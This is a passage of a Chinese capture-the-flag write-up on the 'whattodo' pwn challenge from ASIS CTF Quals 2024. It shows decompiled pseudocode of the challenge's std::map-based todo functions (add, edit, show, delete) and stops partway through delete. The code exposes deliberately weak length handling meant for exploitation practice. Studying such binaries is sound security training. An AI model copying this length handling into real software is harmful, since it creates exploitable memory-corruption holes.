C++中的std::map的运用-ASIS CTF Quals 2024-whattodo

pwn中C++中的std::map的运用和逆向

whattodo

试了下fuzz,没出来

只能逆了

逆向

  1. unsigned __int64 __fastcall todo_add(
  2.         __int64 a1,
  3.         __int64 a2,
  4.         __int64 a3,
  5.         __int64 a4,
  6.         __int64 a5,
  7.         __int64 a6,
  8.         int a7,
  9.         int a8,
  10.         int a9,
  11.         int a10,
  12.         int a11,
  13.         int a12,
  14.         int a13,
  15.         int a14,
  16.         int a15,
  17.         int a16,
  18.         int a17,
  19.         int a18,
  20.         int a19,
  21.         int a20,
  22.         __int64 a21)
  23. {
  24.   // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  26.   *(_QWORD *)&title_string_object.str[8] = __readfsqword(0x28u);
  27.   LOBYTE(title_string_object.ptr) = 0;
  28.   title = &title_string_object;
  29.   max_len = 0LL;
  30.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL);
  31.   std::operator>><char>(std::cin, &amp;title);
  32.   find_node_ptr = (struct node *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find(
  33.                                    (__int64)&amp;map_stuct,
  34.                                    (__int64)&amp;title);
  35.   if ( find_node_ptr != (struct node *)&amp;map_stuct.color )// std::cout << "Already exists" << std::endl;
  36.   {
  37.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Already exists", 14LL);
  38.     v22 = *(_QWORD *)(std::cout[0] - 24LL);
  39.     v23 = *(_BYTE **)((char *)&amp;std::cout[30] + v22);
  40.     if ( !v23 )
  41.       std::__throw_bad_cast();
  42.     if ( v23[56] )
  43.     {
  44.       v24 = v23[67];
  45.     }
  46.     else
  47.     {
  48.       std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&amp;std::cout[30] + v22));
  49.       v24 = 10;
  50.       v27 = *(__int64 (__fastcall **)())(*(_QWORD *)v23 + 48LL);
  51.       if ( v27 != std::ctype<char>::do_widen )
  52.         v24 = ((__int64 (__fastcall *)(_BYTE *, __int64))v27)(v23, 10LL);
  53.     }
  54.     v25 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v24);
  55.     std::ostream::flush(v25);
  56.     goto LABEL_6;
  57.   }
  58.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Length: ", 8LL);
  59.   std::istream::_M_extract<unsigned int>(std::cin, &amp;len);
  60.   len_more1 = (unsigned int)(len + 1);
  61.   todo_node_chunk = (void *)operator new[](len_more1);
  62.   if ( len_more1 )
  63.     memset(todo_node_chunk, 0, len_more1);
  64.   find_node_ptr_1 = find_node_ptr;
  65.   len_3 = len;
  66.   if ( !map_stuct.parents )
  67.     goto LABEL_34;
  68.   find_node_ptr_2 = find_node_ptr;
  69.   root_ = (struct node *)map_stuct.parents;
  70.   title_2 = title;
  71.   max_len_1 = max_len;
  72.   title_1 = title;
  73.   current_node = (struct node *)map_stuct.parents;
  74.   do
  75.   {
  76.     while ( 1 )
  77.     {
  78.       current_node_title_len = current_node->title_str_obj.size;
  79.       len_1 = max_len_1;
  80.       if ( current_node_title_len <= max_len_1 )
  81.         len_1 = current_node->title_str_obj.size;
  82.       if ( len_1 )
  83.       {
  84.         cmp_result = memcmp((const void *)current_node->title_str_obj.ptr, title_1, len_1);
  85.         if ( cmp_result )
  86.           break;
  87.       }
  88.       difference = current_node_title_len - max_len_1;
  89.       if ( difference >= 0x80000000LL )
  90.         goto LABEL_24;
  91.       if ( difference > (__int64)0xFFFFFFFF7FFFFFFFLL )
  92.       {
  93.         cmp_result = difference;
  94.         break;
  95.       }
  96. LABEL_15:
  97.       current_node = (struct node *)current_node->right_son_node;
  98.       if ( !current_node )
  99.         goto LABEL_25;
  100.     }
  101.     if ( cmp_result < 0 )
  102.       goto LABEL_15;
  103. LABEL_24:
  104.     find_node_ptr_1 = current_node;
  105.     current_node = (struct node *)current_node->left_son_node;
  106.   }
  107.   while ( current_node );
  108. LABEL_25:
  109.   max_len_2 = max_len_1;
  110.   find_node_ptr = find_node_ptr_2;
  111.   root = root_;
  112.   if ( find_node_ptr_1 == (struct node *)&amp;map_stuct.color )
  113.     goto LABEL_34;
  114.   len_4 = find_node_ptr_1->title_str_obj.size;
  115.   len_2 = max_len_2;
  116.   if ( len_4 <= max_len_2 )
  117.     len_2 = find_node_ptr_1->title_str_obj.size;
  118.   if ( len_2 )
  119.   {
  120.     LODWORD(v41) = memcmp(title_2, (const void *)find_node_ptr_1->title_str_obj.ptr, len_2);
  121.     if ( (_DWORD)v41 )
  122.     {
  123. LABEL_32:
  124.       if ( (int)v41 < 0 )
  125.         goto LABEL_34;
  126.       goto LABEL_33;
  127.     }
  128.   }
  129.   v41 = max_len_2 - len_4;
  130.   if ( (__int64)(max_len_2 - len_4) > 0x7FFFFFFF )
  131.   {
  132. LABEL_33:
  133.     find_node_ptr_1->todo_pair.todo_ptr = todo_node_chunk;
  134.     LODWORD(find_node_ptr_1->todo_pair.todo_len) = len_3;
  135.     goto LABEL_36;
  136.   }
  137.   if ( v41 >= (__int64)0xFFFFFFFF80000000LL )
  138.     goto LABEL_32;
  139. LABEL_34:
  140.   p_title = &amp;title;
  141.   new_node = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  142.                &amp;map_stuct,
  143.                find_node_ptr_1,
  144.                (char ***)&amp;p_title);
  145.   root = (struct node *)map_stuct.parents;
  146.   new_node->todo_pair.todo_ptr = todo_node_chunk;
  147.   LODWORD(new_node->todo_pair.todo_len) = len_3;
  148.   if ( !root )
  149.     goto insert;
  150.   max_len_2 = max_len;
  151.   title_2 = title;
  152. LABEL_36:
  153.   max_len_3 = max_len_2;
  154.   v44 = find_node_ptr;
  155.   current = root;
  156.   max_len_4 = max_len_3;
  157.   while ( 2 )
  158.   {
  159.     while ( 2 )
  160.     {
  161.       current_len = current->title_str_obj.size;
  162.       len_5 = max_len_4;
  163.       if ( current_len <= max_len_4 )
  164.         len_5 = current->title_str_obj.size;
  165.       if ( !len_5 || (comp_result = memcmp((const void *)current->title_str_obj.ptr, title_2, len_5)) == 0 )
  166.       {
  167.         differ = current_len - max_len_4;
  168.         if ( differ >= 0x80000000LL )
  169.           goto LABEL_46;
  170.         if ( differ > (__int64)0xFFFFFFFF7FFFFFFFLL )
  171.         {
  172.           comp_result = differ;
  173.           break;
  174.         }
  175. LABEL_37:
  176.         current = (struct node *)current->right_son_node;
  177.         if ( !current )
  178.           goto access;
  179.         continue;
  180.       }
  181.       break;
  182.     }
  183.     if ( comp_result < 0 )
  184.       goto LABEL_37;
  185. LABEL_46:
  186.     v44 = current;
  187.     current = (struct node *)current->left_son_node;
  188.     if ( current )
  189.       continue;
  190.     break;
  191.   }
  192. access:
  193.   v51 = max_len_4;
  194.   find_node_ptr = v44;
  195.   v52 = v51;
  196.   if ( find_node_ptr == (struct node *)&amp;map_stuct.color )
  197.     goto insert;
  198.   size = find_node_ptr->title_str_obj.size;
  199.   v54 = v51;
  200.   if ( size <= v51 )
  201.     v54 = find_node_ptr->title_str_obj.size;
  202.   if ( v54 &amp;&amp; (LODWORD(v55) = memcmp(title_2, (const void *)find_node_ptr->title_str_obj.ptr, v54), (_DWORD)v55) )
  203.   {
  204. LABEL_54:
  205.     if ( (int)v55 < 0 )
  206.       goto insert;
  207.   }
  208.   else
  209.   {
  210.     v55 = v52 - size;
  211.     if ( (__int64)(v52 - size) <= 0x7FFFFFFF )
  212.     {
  213.       if ( v55 >= (__int64)0xFFFFFFFF80000000LL )
  214.         goto LABEL_54;
  215. insert:
  216.       title_addr = &amp;title;
  217.       find_node_ptr = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  218.                         &amp;map_stuct,
  219.                         find_node_ptr,
  220.                         (char ***)&amp;title_addr);
  221.     }
  222.   }
  223.   if ( !find_node_ptr->todo_pair.todo_ptr )
  224.   {
  225.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Out of memory", 13LL);
  226.     v56 = *(_QWORD *)(std::cout[0] - 24LL);
  227.     v57 = *(_BYTE **)((char *)&amp;std::cout[30] + v56);
  228.     if ( v57 )
  229.     {
  230.       if ( v57[56] )
  231.       {
  232.         v58 = (unsigned int)(char)v57[67];
  233.       }
  234.       else
  235.       {
  236.         std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&amp;std::cout[30] + v56));
  237.         v58 = 10LL;
  238.         v64 = *(__int64 (__fastcall **)())(*(_QWORD *)v57 + 48LL);
  239.         if ( v64 != std::ctype<char>::do_widen )
  240.           v58 = (unsigned int)((char (__fastcall *)(_BYTE *, __int64))v64)(v57, 10LL);
  241.       }
  242.       v59 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v58);
  243.       std::ostream::flush(v59);
  244.       todo_add(
  245.         (__int64)v59,
  246.         v58,
  247.         v60,
  248.         v61,
  249.         v62,
  250.         v63,
  251.         a7,
  252.         a8,
  253.         a9,
  254.         a10,
  255.         a11,
  256.         a12,
  257.         a13,
  258.         a14,
  259.         a15,
  260.         a16,
  261.         a17,
  262.         a18,
  263.         a19,
  264.         a20,
  265.         a21);
  266.     }
  267.     std::__throw_bad_cast();
  268.   }
  269. LABEL_6:
  270.   if ( title != &amp;title_string_object )
  271.     operator delete(title);
  272.   return *(_QWORD *)&amp;title_string_object.str[8] - __readfsqword(0x28u);
  273. }
  275. unsigned __int64 todo_edit(void)
  276. {
  277.   // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
  279.   *(_QWORD *)&amp;str_obj.str[8] = __readfsqword(0x28u);
  280.   LOBYTE(str_obj.ptr) = 0;
  281.   title_str_obj_ptr = &amp;str_obj;
  282.   len_1 = 0LL;
  283.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL);
  284.   std::operator>><char>(std::cin, &amp;title_str_obj_ptr);
  285.   if ( &amp;map_stuct.color == (_QWORD *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find(
  286.                                        (struct node *)&amp;map_stuct,
  287.                                        (struct node *)&amp;title_str_obj_ptr) )
  288.   {
  289.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL);
  290.     v25 = *(_QWORD *)(std::cout[0] - 24LL);
  291.     v26 = *(_BYTE **)((char *)&amp;std::cout[30] + v25);
  292.     if ( !v26 )
  293.       std::__throw_bad_cast();
  294.     if ( v26[56] )
  295.     {
  296.       v27 = v26[67];
  297.     }
  298.     else
  299.     {
  300.       std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&amp;std::cout[30] + v25));
  301.       v27 = 10;
  302.       v29 = *(__int64 (__fastcall **)())(*(_QWORD *)v26 + 48LL);
  303.       if ( v29 != std::ctype<char>::do_widen )
  304.         v27 = ((__int64 (__fastcall *)(_BYTE *, __int64))v29)(v26, 10LL);
  305.     }
  306.     v28 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v27);
  307.     std::ostream::flush(v28);
  308.     goto finish;
  309.   }
  310.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "TODO: ", 6LL);
  311.   curent = (struct node *)map_stuct.parents;
  312.   if ( !map_stuct.parents )
  313.   {
  314.     end_iterator_adddr = (struct node *)&amp;map_stuct.color;
  315.     goto insert;
  316.   }
  317.   title_1 = title_str_obj_ptr;
  318.   root__node = (struct node *)map_stuct.parents;
  319.   len_2 = len_1;
  320.   end_iterator_adddr_1 = (struct node *)&amp;map_stuct.color;
  321.   do
  322.   {
  323.     while ( 1 )
  324.     {
  325.       current_len = curent->title_str_obj.size;
  326.       len = len_2;
  327.       if ( current_len <= len_2 )
  328.         len = curent->title_str_obj.size;
  329.       if ( len )
  330.       {
  331.         cmp_result = memcmp((const void *)curent->title_str_obj.ptr, title_1, len);
  332.         if ( cmp_result )
  333.           break;
  334.       }
  335.       differ = current_len - len_2;
  336.       if ( differ >= 0x80000000LL )
  337.         goto LABEL_13;
  338.       if ( differ > (__int64)0xFFFFFFFF7FFFFFFFLL )
  339.       {
  340.         cmp_result = differ;
  341.         break;
  342.       }
  343. LABEL_4:
  344.       curent = (struct node *)curent->right_son_node;
  345.       if ( !curent )
  346.         goto LABEL_14;
  347.     }
  348.     if ( cmp_result < 0 )
  349.       goto LABEL_4;
  350. LABEL_13:
  351.     end_iterator_adddr_1 = curent;
  352.     curent = (struct node *)curent->left_son_node;
  353.   }
  354.   while ( curent );
  355. LABEL_14:
  356.   end_iterator_adddr = end_iterator_adddr_1;
  357.   root__node_1 = root__node;
  358.   if ( end_iterator_adddr_1 == (struct node *)&amp;map_stuct.color )
  359.     goto insert;
  360.   end_iterator_adddr_1_len = end_iterator_adddr_1->title_str_obj.size;
  361.   len_3 = len_2;
  362.   if ( end_iterator_adddr_1_len <= len_2 )
  363.     len_3 = end_iterator_adddr_1->title_str_obj.size;
  364.   if ( len_3 )
  365.   {
  366.     LODWORD(comp_result) = memcmp(title_1, (const void *)end_iterator_adddr_1->title_str_obj.ptr, len_3);
  367.     end_iterator_adddr = end_iterator_adddr_1;
  368.     if ( (_DWORD)comp_result )
  369.     {
  370. LABEL_21:
  371.       if ( (int)comp_result < 0 )
  372.         goto insert;
  373.       goto LABEL_22;
  374.     }
  375.   }
  376.   comp_result = len_2 - end_iterator_adddr_1_len;
  377.   if ( (__int64)(len_2 - end_iterator_adddr_1_len) > 0x7FFFFFFF )
  378.   {
  379. LABEL_22:
  380.     *(__int64 *)((char *)&amp;std::cin[2] + *(_QWORD *)(std::cin[0] - 24)) = SLODWORD(end_iterator_adddr->todo_pair.todo_len);
  381.     goto LABEL_23;
  382.   }
  383.   if ( comp_result >= (__int64)0xFFFFFFFF80000000LL )
  384.     goto LABEL_21;
  385. insert:
  386.   p_title_str_obj_ptr = &amp;title_str_obj_ptr;
  387.   v24 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  388.           &amp;map_stuct,
  389.           end_iterator_adddr,
  390.           (char ***)&amp;p_title_str_obj_ptr);
  391.   root__node_1 = (struct node *)map_stuct.parents;
  392.   *(__int64 *)((char *)&amp;std::cin[2] + *(_QWORD *)(std::cin[0] - 24)) = SLODWORD(v24->todo_pair.todo_len);
  393.   if ( !root__node_1 )
  394.   {
  395.     end_iterator_adddr_2 = (struct node *)&amp;map_stuct.color;
  396.     goto LABEL_42;
  397.   }
  398.   title_1 = title_str_obj_ptr;
  399.   len_2 = len_1;
  400. LABEL_23:
  401.   end_iterator_adddr_2 = (struct node *)&amp;map_stuct.color;
  402.   len_4 = len_2;
  403.   curent_node = root__node_1;
  404.   while ( 2 )
  405.   {
  406.     while ( 2 )
  407.     {
  408.       len_5 = curent_node->title_str_obj.size;
  409.       len_6 = len_4;
  410.       if ( len_5 <= len_4 )
  411.         len_6 = curent_node->title_str_obj.size;
  412.       if ( !len_6 || (differ_2 = memcmp((const void *)curent_node->title_str_obj.ptr, title_1, len_6)) == 0 )
  413.       {
  414.         differ_1 = len_5 - len_4;
  415.         if ( differ_1 >= 0x80000000LL )
  416.           goto LABEL_33;
  417.         if ( differ_1 > (__int64)0xFFFFFFFF7FFFFFFFLL )
  418.         {
  419.           differ_2 = differ_1;
  420.           break;
  421.         }
  422. LABEL_24:
  423.         curent_node = (struct node *)curent_node->right_son_node;
  424.         if ( !curent_node )
  425.           goto LABEL_34;
  426.         continue;
  427.       }
  428.       break;
  429.     }
  430.     if ( differ_2 < 0 )
  431.       goto LABEL_24;
  432. LABEL_33:
  433.     end_iterator_adddr_2 = curent_node;
  434.     curent_node = (struct node *)curent_node->left_son_node;
  435.     if ( curent_node )
  436.       continue;
  437.     break;
  438.   }
  439. LABEL_34:
  440.   if ( end_iterator_adddr_2 == (struct node *)&amp;map_stuct.color )
  441.     goto LABEL_42;
  442.   end_iterator_adddr_2_len = end_iterator_adddr_2->title_str_obj.size;
  443.   end_iterator_adddr_2_len_1 = len_4;
  444.   if ( end_iterator_adddr_2_len <= len_4 )
  445.     end_iterator_adddr_2_len_1 = end_iterator_adddr_2->title_str_obj.size;
  446.   if ( end_iterator_adddr_2_len_1
  447.     &amp;&amp; (LODWORD(comp_result_1) = memcmp(
  448.                                    title_1,
  449.                                    (const void *)end_iterator_adddr_2->title_str_obj.ptr,
  450.                                    end_iterator_adddr_2_len_1),
  451.         (_DWORD)comp_result_1) )
  452.   {
  453. LABEL_41:
  454.     if ( (int)comp_result_1 < 0 )
  455.       goto LABEL_42;
  456.   }
  457.   else
  458.   {
  459.     comp_result_1 = len_4 - end_iterator_adddr_2_len;
  460.     if ( (__int64)(len_4 - end_iterator_adddr_2_len) <= 0x7FFFFFFF )
  461.     {
  462.       if ( comp_result_1 >= (__int64)0xFFFFFFFF80000000LL )
  463.         goto LABEL_41;
  464. LABEL_42:
  465.       v32 = &amp;title_str_obj_ptr;
  466.       end_iterator_adddr_2 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  467.                                &amp;map_stuct,
  468.                                end_iterator_adddr_2,
  469.                                (char ***)&amp;v32);
  470.     }
  471.   }
  472.   std::__istream_extract(std::cin, end_iterator_adddr_2->todo_pair.todo_ptr, 0x7FFFFFFFFFFFFFFFLL);
  473. finish:
  474.   if ( title_str_obj_ptr != &amp;str_obj )
  475.     operator delete(title_str_obj_ptr);
  476.   return *(_QWORD *)&amp;str_obj.str[8] - __readfsqword(0x28u);
  477. }
  479. unsigned __int64 todo_show(void)
  480. {
  481.   struct node *curent_node; // r15
  482.   struct string *title_str_obj_ptr_1; // r12
  483.   unsigned __int64 len_1; // r14
  484.   struct node *end_iterator_adddr; // rbx
  485.   unsigned __int64 len_2; // rbp
  486.   size_t len_3; // rdx
  487.   int comp_result; // eax
  488.   unsigned __int64 len_4; // r13
  489.   size_t len_5; // rdx
  490.   int comp_result_1; // eax
  491.   const char *todo_ptr; // rbx
  492.   size_t todo_len; // rax
  493.   _BYTE *v12; // rbx
  494.   char v13; // si
  495.   std::ostream *v14; // rax
  496.   __int64 (__fastcall *v16)(); // rax
  497.   struct string **p_title_str_obj_ptr; // [rsp+18h] [rbp-70h] BYREF
  498.   struct string *title_str_obj_ptr; // [rsp+20h] [rbp-68h] BYREF
  499.   unsigned __int64 len; // [rsp+28h] [rbp-60h]
  500.   struct string str_obj; // [rsp+30h] [rbp-58h] BYREF
  502.   *(_QWORD *)&amp;str_obj.str[8] = __readfsqword(0x28u);
  503.   LOBYTE(str_obj.ptr) = 0;
  504.   title_str_obj_ptr = &amp;str_obj;
  505.   len = 0LL;
  506.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL);
  507.   std::operator>><char>(std::cin, &amp;title_str_obj_ptr);
  508.   if ( &amp;map_stuct.color == (_QWORD *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find(
  509.                                        (struct node *)&amp;map_stuct,
  510.                                        (struct node *)&amp;title_str_obj_ptr) )
  511.   {
  512.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL);
  513.     v12 = *(_BYTE **)((char *)&amp;std::cout[30] + *(_QWORD *)(std::cout[0] - 24LL));
  514.     if ( !v12 )
  515.       std::__throw_bad_cast();
  516.     goto LABEL_27;
  517.   }
  518.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "TODO: ", 6LL);
  519.   curent_node = (struct node *)map_stuct.parents;
  520.   if ( !map_stuct.parents )
  521.   {
  522.     end_iterator_adddr = (struct node *)&amp;map_stuct.color;
  523.     goto LABEL_23;
  524.   }
  525.   title_str_obj_ptr_1 = title_str_obj_ptr;
  526.   len_1 = len;
  527.   end_iterator_adddr = (struct node *)&amp;map_stuct.color;
  528.   do
  529.   {
  530.     while ( 1 )
  531.     {
  532.       len_2 = curent_node->title_str_obj.size;
  533.       len_3 = len_1;
  534.       if ( len_2 <= len_1 )
  535.         len_3 = curent_node->title_str_obj.size;
  536.       if ( len_3 )
  537.       {
  538.         comp_result = memcmp((const void *)curent_node->title_str_obj.ptr, title_str_obj_ptr_1, len_3);
  539.         if ( comp_result )
  540.           break;
  541.       }
  542.       if ( (__int64)(len_2 - len_1) >= 0x80000000LL )
  543.         goto LABEL_13;
  544.       if ( (__int64)(len_2 - len_1) > (__int64)0xFFFFFFFF7FFFFFFFLL )
  545.       {
  546.         comp_result = len_2 - len_1;
  547.         break;
  548.       }
  549. LABEL_4:
  550.       curent_node = (struct node *)curent_node->right_son_node;
  551.       if ( !curent_node )
  552.         goto LABEL_14;
  553.     }
  554.     if ( comp_result < 0 )
  555.       goto LABEL_4;
  556. LABEL_13:
  557.     end_iterator_adddr = curent_node;
  558.     curent_node = (struct node *)curent_node->left_son_node;
  559.   }
  560.   while ( curent_node );
  561. LABEL_14:
  562.   if ( end_iterator_adddr == (struct node *)&amp;map_stuct.color )
  563.     goto LABEL_23;
  564.   len_4 = end_iterator_adddr->title_str_obj.size;
  565.   len_5 = len_1;
  566.   if ( len_4 <= len_1 )
  567.     len_5 = end_iterator_adddr->title_str_obj.size;
  568.   if ( len_5
  569.     &amp;&amp; (comp_result_1 = memcmp(title_str_obj_ptr_1, (const void *)end_iterator_adddr->title_str_obj.ptr, len_5)) != 0 )
  570.   {
  571. LABEL_22:
  572.     if ( comp_result_1 < 0 )
  573.       goto LABEL_23;
  574.   }
  575.   else if ( (__int64)(len_1 - len_4) <= 0x7FFFFFFF )
  576.   {
  577.     if ( (__int64)(len_1 - len_4) >= (__int64)0xFFFFFFFF80000000LL )
  578.     {
  579.       comp_result_1 = len_1 - len_4;
  580.       goto LABEL_22;
  581.     }
  582. LABEL_23:
  583.     p_title_str_obj_ptr = &amp;title_str_obj_ptr;
  584.     end_iterator_adddr = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&amp;,std::tuple<std::string const&amp;>,std::tuple<>>(
  585.                            &amp;map_stuct,
  586.                            end_iterator_adddr,
  587.                            (char ***)&amp;p_title_str_obj_ptr);
  588.   }
  589.   todo_ptr = (const char *)end_iterator_adddr->todo_pair.todo_ptr;
  590.   if ( todo_ptr )
  591.   {
  592.     todo_len = strlen(todo_ptr);
  593.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, todo_ptr, todo_len);
  594.   }
  595.   else
  596.   {
  597.     std::ios::clear(
  598.       (char *)std::cout + *(_QWORD *)(std::cout[0] - 24LL),
  599.       *(_DWORD *)((char *)&amp;std::cout[4] + *(_QWORD *)(std::cout[0] - 24LL)) | 1u);
  600.   }
  601.   v12 = *(_BYTE **)((char *)&amp;std::cout[30] + *(_QWORD *)(std::cout[0] - 24LL));
  602.   if ( !v12 )
  603.     std::__throw_bad_cast();
  604. LABEL_27:
  605.   if ( v12[56] )
  606.   {
  607.     v13 = v12[67];
  608.   }
  609.   else
  610.   {
  611.     std::ctype<char>::_M_widen_init(v12);
  612.     v13 = 10;
  613.     v16 = *(__int64 (__fastcall **)())(*(_QWORD *)v12 + 48LL);
  614.     if ( v16 != std::ctype<char>::do_widen )
  615.       v13 = ((__int64 (__fastcall *)(_BYTE *, __int64))v16)(v12, 10LL);
  616.   }
  617.   v14 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v13);
  618.   std::ostream::flush(v14);
  619.   if ( title_str_obj_ptr != &amp;str_obj )
  620.     operator delete(title_str_obj_ptr);
  621.   return *(_QWORD *)&amp;str_obj.str[8] - __readfsqword(0x28u);
  622. }
  624. unsigned __int64 todo_delete(void)
  625. {
  626.   void *v0; // r13
  627.   void *v1; // r12
  628.   unsigned __int64 v2; // r15
  629.   int *v3; // rbp
  630.   unsigned __int64 v4; // r14
  631.   size_t v5; // rdx
  632.   int v6; // eax
  633.   unsigned __int64 v7; // r14
  634.   size_t v8; // rdx
  635.   int v9; // eax
  636.   void *v10; // rdi
  637.   __int64 v11; // rax
  638.   int *v12; // rdx
  639.   int *v13; // r13
  640.   __int64 v14; // r12
  641.   __int64 v15; // rdi
  642.   __int64 v16; // rax
  643.   void *v17; // rdi
  644.   void *v18; // rbp
  645.   __int64 v20; // rax
  646.   _BYTE *v21; // rbx
  647.   char v22; // si
  648.   std::ostream *v23; // rax
  649.   __int64 (__fastcall *v24)(); // rax
  650.   void **p_s2; // [rsp+18h] [rbp-70h] BYREF
  651.   void *titile; // [rsp+20h] [rbp-68h] BYREF
  652.   unsigned __int64 v27; // [rsp+28h] [rbp-60h]
  653.   __int64 v28[3]; // [rsp+30h] [rbp-58h] BYREF
  654.   unsigned __int64 v29; // [rsp+48h] [rbp-40h]
  656.   v29 = __readfsqword(0x28u);
  657.   LOBYTE(v28[0]) = 0;
  658.   titile = v28;
  659.   v27 = 0LL;
  660.   std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL);
  661.   std::operator>><char>(std::cin, &amp;titile);
  662.   if ( &amp;MEMORY[0x72C8] == (int *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find(
  663.                                    (__int64)&amp;map_stuct,
  664.                                    (__int64)&amp;titile) )
  665.   {
  666.     std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL);
  667.     v20 = *(_QWORD *)(std::cout[0] - 24);
  668.     v21 = *(_BYTE **)((char *)&amp;std::cout[30] + v20);
  669.     if ( !v21 )
  670.       std::__throw_bad_cast();
  671.     if ( v21[56] )
  672.     {
  673.       v22 = v21[67];
  674.     }
  675.     else
  676.     {
  677.       std::ctype<char>::_M_widen_init(*(__int64 *)((char *)&amp;std::cout[30] + v20));
  678.       v22 = 10;
  679.       v24 = *(__int64 (__fastcall **)())(*(_QWORD *)v21 + 48LL);
  680.       if ( v24 != std::ctype<char>::do_widen )
  681.         v22 = ((__int64 (__fastcall *)(_BYTE *, __int64))v24)(v21, 10LL);
  682.     }
  683.     v23 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v22);
  684.     std::ostream::flush(v23);
  685.     goto LABEL_32;
  686.   }
  687.   v0 = MEMORY[0x72D0];
  688.   if ( !MEMORY[0x72D0] )
  689.   {
  690.     v3 = &amp;MEMORY[0x72C8];
  691.     goto LABEL_23;
  692.   }
  693.   v1 = titile;
  694.   v2 = v27;
  695.   v3 = &amp;MEMORY[0x72C8];
  696.   do
  697.   {
  698.     while ( 1 )
  699.     {
  700.       v4 = *((_QWORD *)v0 + 5);
  701.       v5 = v2;
  702.       if ( v4 <= v2 )
  703.         v5 = *((_QWORD *)v0 + 5);
  704.       if ( v5 )
  705.       {
  706.         v6 = memcmp(*((const void **)v0 + 4), v1, v5);
  707.         if ( v6 )
  708.           break;
  709.       }
  710.       if ( (__int64)(v4 - v2) >= 0x80000000LL )
  711.         goto LABEL_13;
  712.       if ( (__int64)(v4 - v2) > (__int64)0xFFFFFFFF7FFFFFFFLL )
  713.       {
  714.         v6 = v4 - v2;
  715.         break;
  716.       }
  717. LABEL_4:
  718.       v0 = (void *)*((_QWORD *)v0 + 3);
  719.       if ( !v0 )
  720.         goto LABEL_14;
  721.     }
  722.     if ( v6 < 0 )
  723.       goto LABEL_4;
  724. LABEL_13:
  725.     v3 = (int *)v0;
  726.     v0 = (void *)*((_QWORD *)v0 + 2);
  727.   }
  728.   while ( v0 );
  729. LABEL_14:
  730.   if ( v3 == &amp;MEMORY[0x72C8] )
  731.     goto LABEL_23;
  732.   v7 = *((_QWORD *)v3 + 5);
  733.   v8 = v2;
  734.   if ( v7 <= v2 )
  735.     v8 = *((_QWORD *)v3 + 5);
  736.   if ( v8 &amp;&amp; (v9 = memcmp(v1, *((const void **)v3 + 4), v8)) != 0 )
  737.   {
  738. LABEL_22:
  739.     if ( v9 < 0 )
  740.       goto LABEL_23;
  741.   }
  742.   else if ( (__int64)(v2 - v7) <= 0x7FFFFFFF )
  743.   {
  744.     if ( (__int64)(v2 - v7) >= (__int64)0xFFFFFFFF80000000LL )
  745.     {
  746.       v9 = v2 - v7;
  747.       goto LABEL_22;
  748.     }
  749. LABEL_23:
  750.     p_s2 = &amp;titile;
